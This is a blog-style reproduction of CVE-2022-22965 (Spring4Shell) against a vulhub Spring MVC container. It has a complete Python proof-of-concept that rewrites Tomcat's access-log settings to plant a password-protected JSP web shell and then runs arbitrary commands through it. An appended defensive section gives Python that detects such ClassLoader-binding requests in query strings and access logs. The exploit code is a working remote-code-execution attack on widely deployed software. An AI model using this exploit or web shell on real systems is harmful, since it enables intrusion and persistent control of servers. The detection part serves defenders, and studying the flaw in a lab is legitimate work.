Reproducing CVE-2022-22965
2022-06-22 14:01:00 【lionwerson】
Summary:
A Spring MVC or Spring WebFlux application running on JDK 9+ may be exposed to remote code execution (RCE).
Reproduction environment:
docker run -d -p 8080:8080 vulhub/spring-webmvc:5.3.17
Once the service is up, open http://your-ip:8080/?name=xxx&age=xxx
and a demo page is shown.

PoC:
Usage: -t sets the target address, -c sets the command to execute (default: id)
import argparse
import requests

# Header values that the injected log pattern references as %{c1}i, %{c2}i and
# %{suffix}i, so these characters never appear in the query string itself.
headers = {
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close',
    'Accept': '*/*',
    'Accept-Language': 'en',
    'suffix': '%>//',
    'c1': 'Runtime',
    'c2': '<%',
    'DNT': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
}
# Plain headers used for the final request that resets the log pattern.
headers_res = {
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'close',
    'Accept': '*/*',
    'Accept-Language': 'en',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
}

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', "--target", help='input target', required=True, type=str)
    parser.add_argument('-c', "--command", help='input poc command', type=str, default='id')
    args = parser.parse_args()
    # Binds Tomcat's AccessLogValve properties (pattern, suffix, directory, prefix,
    # fileDateFormat) through the class.module.classLoader property path.
    url = args.target + "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
    cmd_url = args.target + "/tomcatwar.jsp?pwd=j&cmd=" + args.command
    # Empties the pattern again so the access log stops writing into the file.
    refresh_url = args.target + "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern="
    res = requests.get(url=url, headers=headers)
    try:
        if res.status_code == 200:
            res_cmd = requests.get(url=cmd_url, headers=headers)
            print(res_cmd.text.replace("\x00", ""))
            ref_cmd = requests.get(url=refresh_url, headers=headers_res)
        else:
            print('Vulnerability does not exist')
    except Exception as e:
        print(e)
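As an added defender-side example (my code, not part of the original post or of Spring/Tomcat), the following Python flags requests that bind properties through the class.module.classLoader path the PoC above relies on, first as a plain query-string/form-body check and then run over constructed Tomcat access-log lines. The log format (combined format with the full request line recorded via %r), the regexes and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Property path the PoC binds through: Tomcat's AccessLogValve, reached from the
# bean's class.module.classLoader chain. Names are matched after percent-decoding.
VALVE_PATH = "class.module.classLoader.resources.context.parent.pipeline.first."
VALVE_FIELDS = ("pattern", "suffix", "directory", "prefix", "fileDateFormat")
CLASSLOADER_RE = re.compile(r"(^|\.)class\.module\.classLoader(\.|$)")
# Assumed combined/common access-log line with the full request line (%r) logged.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def analyze_params(query: str) -> dict:
    """Report which ClassLoader-chain properties a query string or form body binds."""
    params = parse_qsl(query, keep_blank_values=True)  # decodes %2E-style evasion
    bound = [name for name, _ in params if CLASSLOADER_RE.search(name)]
    fields = sorted({n[len(VALVE_PATH):] for n in bound if n.startswith(VALVE_PATH)})
    return {"suspicious": bool(bound), "classloader_params": bound,
            "valve_fields": [f for f in fields if f in VALVE_FIELDS]}

def scan_access_log(lines):
    """Return one finding per log line whose request target binds ClassLoader properties."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        result = analyze_params(parts.query)
        if result["suspicious"]:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                             "path": parts.path, **result})
    return findings

# Constructed sample log: one benign demo-page request, one shaped like the PoC's
# first GET (pattern value shortened), and one like its pattern-reset GET.
_ATTACK = "&".join(f"{VALVE_PATH}{f}={v}" for f, v in [
    ("pattern", "%25%7Bc2%7Di"), ("suffix", ".jsp"), ("directory", "webapps/ROOT"),
    ("prefix", "tomcatwar"), ("fileDateFormat", "")])
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Jun/2022:14:01:00 +0800] "GET /?name=vulhub&age=1 HTTP/1.1" 200 512',
    f'10.0.0.9 - - [22/Jun/2022:14:01:05 +0800] "GET /?{_ATTACK} HTTP/1.1" 200 512',
    f'10.0.0.9 - - [22/Jun/2022:14:01:06 +0800] "GET /?{VALVE_PATH}pattern= HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding["ts"], finding["ip"], finding["path"], finding["valve_fields"])
```

Because the data binder also reads form bodies, apply analyze_params to POST bodies at a WAF or reverse proxy as well; access logs only show what arrived in the query string.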